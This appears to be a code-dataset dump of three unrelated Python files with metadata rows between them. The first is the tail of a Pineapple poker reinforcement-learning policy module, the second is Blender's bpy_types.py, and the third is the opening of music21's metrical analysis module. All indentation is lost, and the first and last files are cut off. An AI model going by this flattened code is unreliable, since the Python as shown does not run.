actions = self.game.actions(state)
def eval_action(action):
outcome = self.game.sim_place_cards(state, action)
hands = [g.compute_hand(row) for row in outcome.rows]
return g.compare_hands(hands[1], hands[0]) >= 0 and g.compare_hands(hands[2], hands[1]) >= 0
evals = [(eval_action(action), action) for action in actions]
viable = [y for x, y in evals if x == max(evals)[0]]
return random.sample(viable, 1)[0]
class HeuristicNeverBustPolicy(BasePolicy):
'''
A policy that never plays a move that makes the current hierarchy of cards a bust. Within viable
moves, it attempts to greedily form hands to maximize the total sum of hand values as denoted by
a heuristic table.
Afterwards, it tries to maximize the flexibility of the playable hand, which is the sum of the
number of remaining slots per row raised to a preset power.
'''
def get_action(self, state):
actions = self.game.actions(state)
# Heuristic hand values
self.hand_values = {
'1': 0,
'2': 1,
'2+2': 2,
'3': 4,
'St': 8,
'Fl': 8,
'3+2': 12,
'4': 20,
'StFl': 30,
'RoFl': 50
}
def eval_action(action):
outcome = self.game.sim_place_cards(state, action)
hands = [g.compute_hand(row) for row in outcome.rows]
total_value = sum(self.hand_values[hand[0]] for hand in hands)
flexibility = sum([x ** 0.3 for x in self.game.get_remaining_capacities(outcome)])
return (g.compare_hands(hands[1], hands[0]) >= 0 and g.compare_hands(hands[2], hands[1]) >= 0,
total_value, flexibility)
evals = [(eval_action(action), action) for action in actions]
viable = [y for x, y in evals if x == max(evals)[0]]
return random.sample(viable, 1)[0]
class RLPolicy(BasePolicy):
'''
Base class for all RL policies with incorporate_feedback.
'''
def incorporate_feedback(self, state, action, new_state):
raise NotImplementedError
class QLearningPolicy(RLPolicy):
'''
A class that uses linear approximations of Q values built off of features to guide actions taken while
learning optimal linear weights through feedback incorporation.
'''
def __init__(self, game, args):
'''
Input:
game: Pineapple game instance
feature_extractor: a function that extracts features from a given row. See feature_extractor.py for interface.
exploration_prob: initial probability of exploration
'''
# Initialize step size, weight vector, etc
# Add field to indicate whether training - this determines whether epsilon greedy policy is used
super(QLearningPolicy, self).__init__(game, args)
self.feature_extractor = feature_extractors.name_to_extractor(args.feature_extractor)
self.distinguish_draws = args.distinguish_draws
self.exploration_prob = args.exploration_prob
self.train = True
self.step_size = args.step_size
self.weights = defaultdict(float)
feature_extractors.parse_probability_files()
def get_step_size(self):
return self.step_size
def get_features(self, state, action):
state = self.game.sim_place_cards(state, action)
num_to_draw = self.game.num_to_draw(state)
features = {}
for row_num, cards in enumerate(state.rows):
for k, v in self.feature_extractor(row_num, cards, state.remaining, num_to_draw).iteritems():
if self.distinguish_draws:
features[(num_to_draw, row_num, k)] = v
else:
features[(row_num, k)] = v
return features
def get_q(self, state, action):
# Find exact solution if about to finish
final_state = self.game.sim_place_cards(state, action)
if self.game.is_end(final_state):
return self.game.utility(final_state)
# Otherwise use linear approximation
features = self.get_features(state, action)
return sum(self.weights[key] * features[key] for key in features)
def get_action(self, state):
actions = self.game.actions(state)
if self.train and random.random() < self.exploration_prob:
return random.choice(actions)
return max((self.get_q(state, action), action) for action in actions)[1]
def incorporate_feedback(self, state, action, new_state):
if not self.train:
return
if self.game.is_end(new_state):
return
else:
prediction = self.get_q(state, action)
V_opt = max(self.get_q(new_state, a) for a in self.game.actions(new_state))
features = self.get_features(state, action)
deviation = prediction - V_opt
total_update = 0
for (name, value) in features.iteritems():
self.weights[name] -= self.get_step_size() * deviation * value
total_update += abs(self.get_step_size() * deviation * value)
# print "Total update:", total_update, "Deviation:", deviation, "len(features):", len(features) #,
class QLearningPolicy2(QLearningPolicy):
'''
A version of QLearningPolicy above that uses feature extractors that work on generic state, action
pairs.
'''
def __init__(self, game, args):
super(QLearningPolicy2, self).__init__(game, args)
self.feature_extractor = self.feature_extractor(self.game)
self.weights = self.feature_extractor.default_weights()
def get_features(self, state, action):
return self.feature_extractor.extract(state, action)
class OracleEvalPolicy(BasePolicy):
'''
A policy that uses the oracle best case royalties averaged over several draws to optimize the
current action.
'''
def __init__(self, game, args):
super(OracleEvalPolicy, self).__init__(game, args)
self.num_sims = args.num_oracle_sims
self.alpha = args.oracle_outcome_weighting
def get_action(self, state):
actions = self.game.actions(state)
def eval_action(action):
outcome = self.game.sim_place_cards(state, action)
values = []
if self.game.num_to_draw(outcome) == 0:
return self.game.utility(outcome)
num_to_draw_map = {12: 8, 9: 6, 6: 5, 3: 3}
# num_to_draw = int(math.ceil(self.game.num_to_draw(outcome) * 0.7))
num_to_draw = num_to_draw_map[self.game.num_to_draw(outcome)]
num_sims = self.num_sims
for _ in xrange(self.num_sims):
draw = random.sample(outcome.remaining, num_to_draw)
values += [hand_optimizer.optimize_hand(outcome.rows, draw)]
values = np.array(values)
return (np.mean(np.sign(values) * np.abs(values) ** self.alpha)) ** (1. / self.alpha)
eval_actions = [(eval_action(action), action) for action in actions]
# print "Estimated value: {}".format(max(eval_actions)[0])
return max(eval_actions)[1]
class VarSimOracleEvalPolicy(BasePolicy):
'''
OracleEvalPolicy with a different exploration policy that explores the best actions in greater depth.
'''
def __init__(self, game, args):
super(VarSimOracleEvalPolicy, self).__init__(game, args)
self.num_sims = args.num_oracle_sims
def get_action(self, state):
actions = self.game.actions(state)
outcomes = [(self.game.sim_place_cards(state, action), action) for action in actions]
num_to_draw_map = {12: 8, 9: 6, 6: 5, 3: 3, 0: 0}
def interpolate_action(prev, outcome, num_sims, round_num):
values = []
num_to_draw = num_to_draw_map[self.game.num_to_draw(outcome)]
for _ in xrange(num_sims):
draw = random.sample(outcome.remaining, num_to_draw)
values += [hand_optimizer.optimize_hand(outcome.rows, draw)]
values = np.array(values)
return prev * (1 - 1. / round_num) + np.mean(values) / round_num
outcomes_with_histories = [(0., outcome, action) for outcome, action in outcomes]
round_num = 1.
while len(outcomes_with_histories) > 1:
outcomes_with_histories = [(interpolate_action(prev, outcome, self.num_sims, round_num), outcome, action)
for prev, outcome, action in outcomes_with_histories]
outcomes_with_histories.sort()
outcomes_with_histories = outcomes_with_histories[len(outcomes_with_histories) / 2:]
round_num += 1
return outcomes_with_histories[0][2]
class TDLearningPolicy(RLPolicy):
'''
A class that uses linear approximations of Value functions built off of features to guide actions taken while
learning optimal linear weights through feedback incorporation.
'''
def __init__(self, game, args):
'''
Input:
game: Pineapple game instance
feature_extractor: a function that extracts features from a given row. See feature_extractor.py for interface.
exploration_prob: initial probability of exploration
'''
# Initialize step size, weight vector, etc
# Add field to indicate whether training - this determines whether epsilon greedy policy is used
super(TDLearningPolicy, self).__init__(game, args)
self.feature_extractor = feature_extractors.name_to_extractor(args.feature_extractor)
self.exploration_prob = args.exploration_prob
self.train = True
self.step_size = args.step_size
self.weights = defaultdict(float)
feature_extractors.parse_probability_files()
def get_step_size(self):
return self.step_size
def get_features(self, state, action):
pass
def get_q(self, state, action):
pass
def get_action(self, state):
pass
def incorporate_feedback(self, state, action, new_state):
pass
'''
Adversarial capable policies below
'''
class AdvVarSimOracleEvalPolicy(BasePolicy):
'''
Adversarial version of VarSimOracleEvalPolicy
'''
def __init__(self, game, args):
super(AdvVarSimOracleEvalPolicy, self).__init__(game, args)
self.num_sims = args.num_oracle_sims
self.num_opp_sims = args.num_opp_sims
def get_action(self, state):
actions = self.game.actions(state)
outcomes = [(self.game.sim_place_cards(state, action), action) for action in actions]
num_to_draw = self.game.num_to_draw(outcomes[0][0])
table = {0: 17, 5: 12, 7: 9, 9: 6, 11: 3, 13: 0}
opp_num_to_draw = table[sum(len(x) for x in state.opp_rows)]
opp_rows = state.opp_rows
# TODO: Better adversarial fantasyland bonus calculation
opp_num_to_draw_map = {12: 8, 9: 6, 6: 5, 3: 3, 0: 0}
if opp_num_to_draw <= 9:
opp_combos = []
if opp_num_to_draw > 0:
num_to_draw_sim = opp_num_to_draw_map[opp_num_to_draw]
for _ in xrange(self.num_opp_sims):
# state.remaining and outcome.remaining for any outcome should be equal
draw = random.sample(state.remaining, num_to_draw_sim)
# Assume opponent just plays to maximize their royalties
value, combo = hand_optimizer.optimize_hand(opp_rows, draw, return_combo=True)
opp_combos += [combo]
else:
opp_combos = [[g.compute_hand(cards) for cards in opp_rows]]
value_fn = lambda rows, draw: hand_optimizer.optimize_hand_adv(rows, draw, opp_combos)
else:
value_fn = lambda rows, draw: hand_optimizer.optimize_hand(rows, draw)
num_to_draw_map = {12: 8, 9: 6, 6: 5, 3: 3, 0: 0}
def interpolate_action(prev, outcome, num_sims, round_num):
values = []
num_to_draw_sim = num_to_draw_map[num_to_draw]
for _ in xrange(num_sims):
draw = random.sample(outcome.remaining, num_to_draw_sim)
values += [value_fn(outcome.rows, draw)]
values = np.array(values)
return prev * (1 - 1. / round_num) + np.mean(values) / round_num
outcomes_with_histories = [(0., outcome, action) for outcome, action in outcomes]
round_num = 1.
while len(outcomes_with_histories) > 1:
outcomes_with_histories = [(interpolate_action(prev, outcome, self.num_sims, round_num), outcome, action)
for prev, outcome, action in outcomes_with_histories]
outcomes_with_histories.sort()
outcomes_with_histories = outcomes_with_histories[len(outcomes_with_histories) / 2:]
round_num += 1
return outcomes_with_histories[0][2]
| mit | -9,055,318,519,636,846,000 | 35.731415 | 116 | 0.65757 | false |
Passtechsoft/TPEAlpGen | blender/release/scripts/modules/bpy_types.py | 1 | 24184 | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8-80 compliant>
from _bpy import types as bpy_types
import _bpy
StructRNA = bpy_types.bpy_struct
StructMetaPropGroup = bpy_types.bpy_struct_meta_idprop
# StructRNA = bpy_types.Struct
bpy_types.BlendDataLibraries.load = _bpy._library_load
class Context(StructRNA):
__slots__ = ()
def copy(self):
from types import BuiltinMethodType
new_context = {}
generic_attrs = (
*StructRNA.__dict__.keys(),
"bl_rna", "rna_type", "copy",
)
for attr in dir(self):
if not (attr.startswith("_") or attr in generic_attrs):
value = getattr(self, attr)
if type(value) != BuiltinMethodType:
new_context[attr] = value
return new_context
class Library(bpy_types.ID):
__slots__ = ()
@property
def users_id(self):
"""ID data blocks which use this library"""
import bpy
# See: readblenentry.c, IDTYPE_FLAGS_ISLINKABLE,
# we could make this an attribute in rna.
attr_links = ("actions", "armatures", "brushes", "cameras",
"curves", "grease_pencil", "groups", "images",
"lamps", "lattices", "materials", "metaballs",
"meshes", "node_groups", "objects", "scenes",
"sounds", "speakers", "textures", "texts",
"fonts", "worlds")
return tuple(id_block
for attr in attr_links
for id_block in getattr(bpy.data, attr)
if id_block.library == self)
class Texture(bpy_types.ID):
__slots__ = ()
@property
def users_material(self):
"""Materials that use this texture"""
import bpy
return tuple(mat for mat in bpy.data.materials
if self in [slot.texture
for slot in mat.texture_slots
if slot]
)
@property
def users_object_modifier(self):
"""Object modifiers that use this texture"""
import bpy
return tuple(obj for obj in bpy.data.objects if
self in [mod.texture
for mod in obj.modifiers
if mod.type == 'DISPLACE']
)
class Group(bpy_types.ID):
__slots__ = ()
@property
def users_dupli_group(self):
"""The dupli group this group is used in"""
import bpy
return tuple(obj for obj in bpy.data.objects
if self == obj.dupli_group)
class Object(bpy_types.ID):
__slots__ = ()
@property
def children(self):
"""All the children of this object"""
import bpy
return tuple(child for child in bpy.data.objects
if child.parent == self)
@property
def users_group(self):
"""The groups this object is in"""
import bpy
return tuple(group for group in bpy.data.groups
if self in group.objects[:])
@property
def users_scene(self):
"""The scenes this object is in"""
import bpy
return tuple(scene for scene in bpy.data.scenes
if self in scene.objects[:])
class WindowManager(bpy_types.ID):
__slots__ = ()
def popup_menu(self, draw_func, title="", icon='NONE'):
import bpy
popup = self.pupmenu_begin__internal(title, icon)
try:
draw_func(popup, bpy.context)
finally:
self.pupmenu_end__internal(popup)
def popup_menu_pie(self, event, draw_func, title="", icon='NONE'):
import bpy
pie = self.piemenu_begin__internal(title, icon, event)
if pie:
try:
draw_func(pie, bpy.context)
finally:
self.piemenu_end__internal(pie)
class _GenericBone:
"""
functions for bones, common between Armature/Pose/Edit bones.
internal subclassing use only.
"""
__slots__ = ()
def translate(self, vec):
"""Utility function to add *vec* to the head and tail of this bone"""
self.head += vec
self.tail += vec
def parent_index(self, parent_test):
"""
The same as 'bone in other_bone.parent_recursive'
but saved generating a list.
"""
# use the name so different types can be tested.
name = parent_test.name
parent = self.parent
i = 1
while parent:
if parent.name == name:
return i
parent = parent.parent
i += 1
return 0
@property
def x_axis(self):
""" Vector pointing down the x-axis of the bone.
"""
from mathutils import Vector
return self.matrix.to_3x3() * Vector((1.0, 0.0, 0.0))
@property
def y_axis(self):
""" Vector pointing down the y-axis of the bone.
"""
from mathutils import Vector
return self.matrix.to_3x3() * Vector((0.0, 1.0, 0.0))
@property
def z_axis(self):
""" Vector pointing down the z-axis of the bone.
"""
from mathutils import Vector
return self.matrix.to_3x3() * Vector((0.0, 0.0, 1.0))
@property
def basename(self):
"""The name of this bone before any '.' character"""
#return self.name.rsplit(".", 1)[0]
return self.name.split(".")[0]
@property
def parent_recursive(self):
"""A list of parents, starting with the immediate parent"""
parent_list = []
parent = self.parent
while parent:
if parent:
parent_list.append(parent)
parent = parent.parent
return parent_list
@property
def center(self):
"""The midpoint between the head and the tail."""
return (self.head + self.tail) * 0.5
@property
def length(self):
"""
The distance from head to tail,
when set the head is moved to fit the length.
"""
return self.vector.length
@length.setter
def length(self, value):
self.tail = self.head + ((self.tail - self.head).normalized() * value)
@property
def vector(self):
"""
The direction this bone is pointing.
Utility function for (tail - head)
"""
return (self.tail - self.head)
@property
def children(self):
"""A list of all the bones children."""
return [child for child in self._other_bones if child.parent == self]
@property
def children_recursive(self):
"""A list of all children from this bone."""
bones_children = []
for bone in self._other_bones:
index = bone.parent_index(self)
if index:
bones_children.append((index, bone))
# sort by distance to parent
bones_children.sort(key=lambda bone_pair: bone_pair[0])
return [bone for index, bone in bones_children]
@property
def children_recursive_basename(self):
"""
Returns a chain of children with the same base name as this bone.
Only direct chains are supported, forks caused by multiple children
with matching base names will terminate the function
and not be returned.
"""
basename = self.basename
chain = []
child = self
while True:
children = child.children
children_basename = []
for child in children:
if basename == child.basename:
children_basename.append(child)
if len(children_basename) == 1:
child = children_basename[0]
chain.append(child)
else:
if children_basename:
print("multiple basenames found, "
"this is probably not what you want!",
self.name, children_basename)
break
return chain
@property
def _other_bones(self):
id_data = self.id_data
id_data_type = type(id_data)
if id_data_type == bpy_types.Object:
bones = id_data.pose.bones
elif id_data_type == bpy_types.Armature:
bones = id_data.edit_bones
if not bones: # not in edit mode
bones = id_data.bones
return bones
class PoseBone(StructRNA, _GenericBone, metaclass=StructMetaPropGroup):
__slots__ = ()
@property
def children(self):
obj = self.id_data
pbones = obj.pose.bones
self_bone = self.bone
return tuple(pbones[bone.name] for bone in obj.data.bones
if bone.parent == self_bone)
class Bone(StructRNA, _GenericBone, metaclass=StructMetaPropGroup):
__slots__ = ()
class EditBone(StructRNA, _GenericBone, metaclass=StructMetaPropGroup):
__slots__ = ()
def align_orientation(self, other):
"""
Align this bone to another by moving its tail and settings its roll
the length of the other bone is not used.
"""
vec = other.vector.normalized() * self.length
self.tail = self.head + vec
self.roll = other.roll
def transform(self, matrix, scale=True, roll=True):
"""
Transform the the bones head, tail, roll and envelope
(when the matrix has a scale component).
:arg matrix: 3x3 or 4x4 transformation matrix.
:type matrix: :class:`mathutils.Matrix`
:arg scale: Scale the bone envelope by the matrix.
:type scale: bool
:arg roll:
Correct the roll to point in the same relative
direction to the head and tail.
:type roll: bool
"""
from mathutils import Vector
z_vec = self.matrix.to_3x3() * Vector((0.0, 0.0, 1.0))
self.tail = matrix * self.tail
self.head = matrix * self.head
if scale:
scalar = matrix.median_scale
self.head_radius *= scalar
self.tail_radius *= scalar
if roll:
self.align_roll(matrix * z_vec)
def ord_ind(i1, i2):
if i1 < i2:
return i1, i2
return i2, i1
class Mesh(bpy_types.ID):
__slots__ = ()
def from_pydata(self, vertices, edges, faces):
"""
Make a mesh from a list of vertices/edges/faces
Until we have a nicer way to make geometry, use this.
:arg vertices:
float triplets each representing (X, Y, Z)
eg: [(0.0, 1.0, 0.5), ...].
:type vertices: iterable object
:arg edges:
int pairs, each pair contains two indices to the
*vertices* argument. eg: [(1, 2), ...]
:type edges: iterable object
:arg faces:
iterator of faces, each faces contains three or more indices to
the *vertices* argument. eg: [(5, 6, 8, 9), (1, 2, 3), ...]
:type faces: iterable object
"""
self.vertices.add(len(vertices))
self.edges.add(len(edges))
self.loops.add(sum((len(f) for f in faces)))
self.polygons.add(len(faces))
vertices_flat = [f for v in vertices for f in v]
self.vertices.foreach_set("co", vertices_flat)
del vertices_flat
edges_flat = [i for e in edges for i in e]
self.edges.foreach_set("vertices", edges_flat)
del edges_flat
# this is different in bmesh
loop_index = 0
for i, p in enumerate(self.polygons):
f = faces[i]
loop_len = len(f)
p.loop_start = loop_index
p.loop_total = loop_len
p.vertices = f
loop_index += loop_len
# if no edges - calculate them
if faces and (not edges):
self.update(calc_edges=True)
@property
def edge_keys(self):
return [ed.key for ed in self.edges]
class MeshEdge(StructRNA):
__slots__ = ()
@property
def key(self):
return ord_ind(*tuple(self.vertices))
class MeshTessFace(StructRNA):
__slots__ = ()
@property
def center(self):
"""The midpoint of the face."""
face_verts = self.vertices[:]
mesh_verts = self.id_data.vertices
if len(face_verts) == 3:
return (mesh_verts[face_verts[0]].co +
mesh_verts[face_verts[1]].co +
mesh_verts[face_verts[2]].co
) / 3.0
else:
return (mesh_verts[face_verts[0]].co +
mesh_verts[face_verts[1]].co +
mesh_verts[face_verts[2]].co +
mesh_verts[face_verts[3]].co
) / 4.0
@property
def edge_keys(self):
verts = self.vertices[:]
if len(verts) == 3:
return (ord_ind(verts[0], verts[1]),
ord_ind(verts[1], verts[2]),
ord_ind(verts[2], verts[0]),
)
else:
return (ord_ind(verts[0], verts[1]),
ord_ind(verts[1], verts[2]),
ord_ind(verts[2], verts[3]),
ord_ind(verts[3], verts[0]),
)
class MeshPolygon(StructRNA):
__slots__ = ()
@property
def edge_keys(self):
verts = self.vertices[:]
vlen = len(self.vertices)
return [ord_ind(verts[i], verts[(i + 1) % vlen]) for i in range(vlen)]
@property
def loop_indices(self):
start = self.loop_start
end = start + self.loop_total
return range(start, end)
class Text(bpy_types.ID):
__slots__ = ()
def as_string(self):
"""Return the text as a string."""
return "\n".join(line.body for line in self.lines)
def from_string(self, string):
"""Replace text with this string."""
self.clear()
self.write(string)
@property
def users_logic(self):
"""Logic bricks that use this text"""
import bpy
return tuple(obj for obj in bpy.data.objects
if self in [cont.text for cont in obj.game.controllers
if cont.type == 'PYTHON']
)
# values are module: [(cls, path, line), ...]
TypeMap = {}
class Sound(bpy_types.ID):
__slots__ = ()
@property
def factory(self):
"""The aud.Factory object of the sound."""
import aud
return aud._sound_from_pointer(self.as_pointer())
class RNAMeta(type):
def __new__(cls, name, bases, classdict, **args):
result = type.__new__(cls, name, bases, classdict)
if bases and bases[0] is not StructRNA:
from _weakref import ref as ref
module = result.__module__
# first part of packages only
if "." in module:
module = module[:module.index(".")]
TypeMap.setdefault(module, []).append(ref(result))
return result
@property
def is_registered(cls):
return "bl_rna" in cls.__dict__
class OrderedDictMini(dict):
def __init__(self, *args):
self.order = []
dict.__init__(self, args)
def __setitem__(self, key, val):
dict.__setitem__(self, key, val)
if key not in self.order:
self.order.append(key)
def __delitem__(self, key):
dict.__delitem__(self, key)
self.order.remove(key)
class RNAMetaPropGroup(StructMetaPropGroup, RNAMeta):
pass
class OrderedMeta(RNAMeta):
def __init__(cls, name, bases, attributes):
if attributes.__class__ is OrderedDictMini:
cls.order = attributes.order
def __prepare__(name, bases, **kwargs):
return OrderedDictMini() # collections.OrderedDict()
# Only defined so operators members can be used by accessing self.order
# with doc generation 'self.properties.bl_rna.properties' can fail
class Operator(StructRNA, metaclass=OrderedMeta):
__slots__ = ()
def __getattribute__(self, attr):
properties = StructRNA.path_resolve(self, "properties")
bl_rna = getattr(properties, "bl_rna", None)
if (bl_rna is not None) and (attr in bl_rna.properties):
return getattr(properties, attr)
return super().__getattribute__(attr)
def __setattr__(self, attr, value):
properties = StructRNA.path_resolve(self, "properties")
bl_rna = getattr(properties, "bl_rna", None)
if (bl_rna is not None) and (attr in bl_rna.properties):
return setattr(properties, attr, value)
return super().__setattr__(attr, value)
def __delattr__(self, attr):
properties = StructRNA.path_resolve(self, "properties")
bl_rna = getattr(properties, "bl_rna", None)
if (bl_rna is not None) and (attr in bl_rna.properties):
return delattr(properties, attr)
return super().__delattr__(attr)
def as_keywords(self, ignore=()):
"""Return a copy of the properties as a dictionary"""
ignore = ignore + ("rna_type",)
return {attr: getattr(self, attr)
for attr in self.properties.rna_type.properties.keys()
if attr not in ignore}
class Macro(StructRNA, metaclass=OrderedMeta):
# bpy_types is imported before ops is defined
# so we have to do a local import on each run
__slots__ = ()
@classmethod
def define(self, opname):
from _bpy import ops
return ops.macro_define(self, opname)
class PropertyGroup(StructRNA, metaclass=RNAMetaPropGroup):
__slots__ = ()
class RenderEngine(StructRNA, metaclass=RNAMeta):
__slots__ = ()
class KeyingSetInfo(StructRNA, metaclass=RNAMeta):
__slots__ = ()
class AddonPreferences(StructRNA, metaclass=RNAMeta):
__slots__ = ()
class _GenericUI:
__slots__ = ()
@classmethod
def _dyn_ui_initialize(cls):
draw_funcs = getattr(cls.draw, "_draw_funcs", None)
if draw_funcs is None:
def draw_ls(self, context):
# ensure menus always get default context
operator_context_default = self.layout.operator_context
for func in draw_ls._draw_funcs:
# so bad menu functions don't stop
# the entire menu from drawing
try:
func(self, context)
except:
import traceback
traceback.print_exc()
self.layout.operator_context = operator_context_default
draw_funcs = draw_ls._draw_funcs = [cls.draw]
cls.draw = draw_ls
return draw_funcs
@classmethod
def append(cls, draw_func):
"""
Append a draw function to this menu,
takes the same arguments as the menus draw function
"""
draw_funcs = cls._dyn_ui_initialize()
draw_funcs.append(draw_func)
@classmethod
def prepend(cls, draw_func):
"""
Prepend a draw function to this menu, takes the same arguments as
the menus draw function
"""
draw_funcs = cls._dyn_ui_initialize()
draw_funcs.insert(0, draw_func)
@classmethod
def remove(cls, draw_func):
"""Remove a draw function that has been added to this menu"""
draw_funcs = cls._dyn_ui_initialize()
try:
draw_funcs.remove(draw_func)
except ValueError:
pass
class Panel(StructRNA, _GenericUI, metaclass=RNAMeta):
__slots__ = ()
class UIList(StructRNA, _GenericUI, metaclass=RNAMeta):
__slots__ = ()
class Header(StructRNA, _GenericUI, metaclass=RNAMeta):
__slots__ = ()
class Menu(StructRNA, _GenericUI, metaclass=RNAMeta):
__slots__ = ()
def path_menu(self, searchpaths, operator,
props_default=None, filter_ext=None):
layout = self.layout
# hard coded to set the operators 'filepath' to the filename.
import os
import bpy.utils
layout = self.layout
if not searchpaths:
layout.label("* Missing Paths *")
# collect paths
files = []
for directory in searchpaths:
files.extend([(f, os.path.join(directory, f))
for f in os.listdir(directory)
if (not f.startswith("."))
if ((filter_ext is None) or
(filter_ext(os.path.splitext(f)[1])))
])
files.sort()
for f, filepath in files:
props = layout.operator(operator,
text=bpy.path.display_name(f),
translate=False)
if props_default is not None:
for attr, value in props_default.items():
setattr(props, attr, value)
props.filepath = filepath
if operator == "script.execute_preset":
props.menu_idname = self.bl_idname
def draw_preset(self, context):
"""
Define these on the subclass:
- preset_operator (string)
- preset_subdir (string)
Optionally:
- preset_extensions (set of strings)
- preset_operator_defaults (dict of keyword args)
"""
import bpy
ext_valid = getattr(self, "preset_extensions", {".py", ".xml"})
props_default = getattr(self, "preset_operator_defaults", None)
self.path_menu(bpy.utils.preset_paths(self.preset_subdir),
self.preset_operator,
props_default=props_default,
filter_ext=lambda ext: ext.lower() in ext_valid)
@classmethod
def draw_collapsible(cls, context, layout):
# helper function for (optionally) collapsed header menus
# only usable within headers
if context.area.show_menus:
cls.draw_menus(layout, context)
else:
layout.menu(cls.__name__, icon='COLLAPSEMENU')
class NodeTree(bpy_types.ID, metaclass=RNAMetaPropGroup):
__slots__ = ()
class Node(StructRNA, metaclass=RNAMetaPropGroup):
__slots__ = ()
@classmethod
def poll(cls, ntree):
return True
class NodeInternal(Node):
__slots__ = ()
class NodeSocket(StructRNA, metaclass=RNAMetaPropGroup):
__slots__ = ()
@property
def links(self):
"""List of node links from or to this socket"""
return tuple(link for link in self.id_data.links
if (link.from_socket == self or
link.to_socket == self))
class NodeSocketInterface(StructRNA, metaclass=RNAMetaPropGroup):
__slots__ = ()
# These are intermediate subclasses, need a bpy type too
class CompositorNode(NodeInternal):
__slots__ = ()
@classmethod
def poll(cls, ntree):
return ntree.bl_idname == 'CompositorNodeTree'
def update(self):
self.tag_need_exec()
class ShaderNode(NodeInternal):
__slots__ = ()
@classmethod
def poll(cls, ntree):
return ntree.bl_idname == 'ShaderNodeTree'
class TextureNode(NodeInternal):
__slots__ = ()
@classmethod
def poll(cls, ntree):
return ntree.bl_idname == 'TextureNodeTree'
| gpl-3.0 | 5,162,792,521,147,929,000 | 27.72209 | 78 | 0.556732 | false |
arnavd96/Cinemiezer | myvenv/lib/python3.4/site-packages/music21/analysis/metrical.py | 1 | 6733 | # -*- coding: utf-8 -*-
#-------------------------------------------------------------------------------
# Name: metrical.py
# Purpose: Tools for metrical analysis
#
# Authors: Christopher Ariza
# Michael Scott Cuthbert
#
# Copyright: Copyright © 2009-2012 Michael Scott Cuthbert and the music21 Project
# License: LGPL or BSD, see license.txt
#-------------------------------------------------------------------------------
'''
Various tools and utilities for doing metrical or rhythmic analysis.
See the chapter :ref:`User's Guide Chapter 14: Time Signatures <usersGuide_14_timeSignatures>`
for more information on defining
metrical structures in music21.
'''
from music21 import stream
import copy
import unittest
from music21 import environment
_MOD = "analysis.metrical.py"
environLocal = environment.Environment(_MOD)
def labelBeatDepth(streamIn):
r'''
Modify a Stream in place by annotating metrical analysis symbols.
This assumes that the Stream is already partitioned into Measures.
>>> s = stream.Stream()
>>> ts = meter.TimeSignature('4/4')
>>> s.insert(0, ts)
>>> n = note.Note(type='eighth')
>>> s.repeatAppend(n, 8)
>>> s.makeMeasures(inPlace = True)
>>> post = analysis.metrical.labelBeatDepth(s)
>>> sOut = []
>>> for n in s.flat.notes:
... stars = "".join([l.text for l in n.lyrics])
... sOut.append("{0:8s} {1}".format(n.beatStr, stars))
>>> print("\n".join(sOut))
1 ****
1 1/2 *
2 **
2 1/2 *
3 ***
3 1/2 *
4 **
4 1/2 *
'''
for m in streamIn.getElementsByClass(stream.Measure):
# this will search contexts
ts = m.getTimeSignatures(sortByCreationTime=False)[0]
# need to make a copy otherwise the .beat/.beatStr values will be messed up (1/4 the normal)
tsTemp = copy.deepcopy(ts)
tsTemp.beatSequence.subdivideNestedHierarchy(depth=3)
for n in m.notesAndRests:
if n.tie != None:
environLocal.printDebug(['note, tie', n, n.tie, n.tie.type])
if n.tie.type == 'stop':
continue
for unused_i in range(tsTemp.getBeatDepth(n.offset)):
n.addLyric('*')
return streamIn
def thomassenMelodicAccent(streamIn):
'''
adds a attribute melodicAccent to each note of a :class:`~music21.stream.Stream` object
according to the method postulated in Joseph M. Thomassen, "Melodic accent: Experiments and
a tentative model," ''Journal of the Acoustical Society of America'', Vol. 71, No. 6 (1982) pp.
1598-1605; with, Erratum, ''Journal of the Acoustical Society of America'', Vol. 73,
No. 1 (1983) p.373, and in David Huron and Matthew Royal,
"What is melodic accent? Converging evidence
from musical practice." ''Music Perception'', Vol. 13, No. 4 (1996) pp. 489-516.
Similar to the humdrum melac_ tool.
.. _melac: http://www.music-cog.ohio-state.edu/Humdrum/commands/melac.html
Takes in a Stream of :class:`~music21.note.Note` objects (use `.flat.notes` to get it, or
better `.flat.getElementsByClass('Note')` to filter out chords) and adds the attribute to
each. Note that Huron and Royal's work suggests that melodic accent has a correlation
with metrical accent only for solo works/passages; even treble passages do not have a
strong correlation. (Gregorian chants were found to have a strong ''negative'' correlation
between melodic accent and syllable onsets)
Following Huron's lead, we assign a `melodicAccent` of 1.0 to the first note in a piece
and take the accent marker of the first interval alone to the second note and
of the last interval alone to be the accent of the last note.
Example from Thomassen, figure 5:
>>> s = converter.parse('tinynotation: 7/4 c4 c c d e d d')
>>> analysis.metrical.thomassenMelodicAccent(s.flat.notes)
>>> for n in s.flat.notes:
... (n.pitch.nameWithOctave, n.melodicAccent)
('C4', 1.0)
('C4', 0.0)
('C4', 0.0)
('D4', 0.33)
('E4', 0.5561)
('D4', 0.17)
('D4', 0.0)
'''
# we use .ps instead of Intervals for speed, since
# we just need perceived contours
maxNotes = len(streamIn) - 1
p2Accent = 1.0
for i,n in enumerate(streamIn):
if i == 0:
n.melodicAccent = 1.0
continue
elif i == maxNotes:
n.melodicAccent = p2Accent
continue
lastPs = streamIn[i-1].pitch.ps
thisPs = n.pitch.ps
nextPs = streamIn[i+1].pitch.ps
if lastPs == thisPs and thisPs == nextPs:
thisAccent = 0.0
nextAccent = 0.0
elif lastPs != thisPs and thisPs == nextPs:
thisAccent = 1.0
nextAccent = 0.0
elif lastPs == thisPs and thisPs != nextPs:
thisAccent = 0.0
nextAccent = 1.0
elif lastPs < thisPs and thisPs > nextPs:
thisAccent = 0.83
nextAccent = 0.17
elif lastPs > thisPs and thisPs < nextPs:
thisAccent = 0.71
nextAccent = 0.29
elif lastPs < thisPs and thisPs < nextPs:
thisAccent = 0.33
nextAccent = 0.67
elif lastPs > thisPs and thisPs > nextPs:
thisAccent = 0.5
nextAccent = 0.5
n.melodicAccent = thisAccent * p2Accent
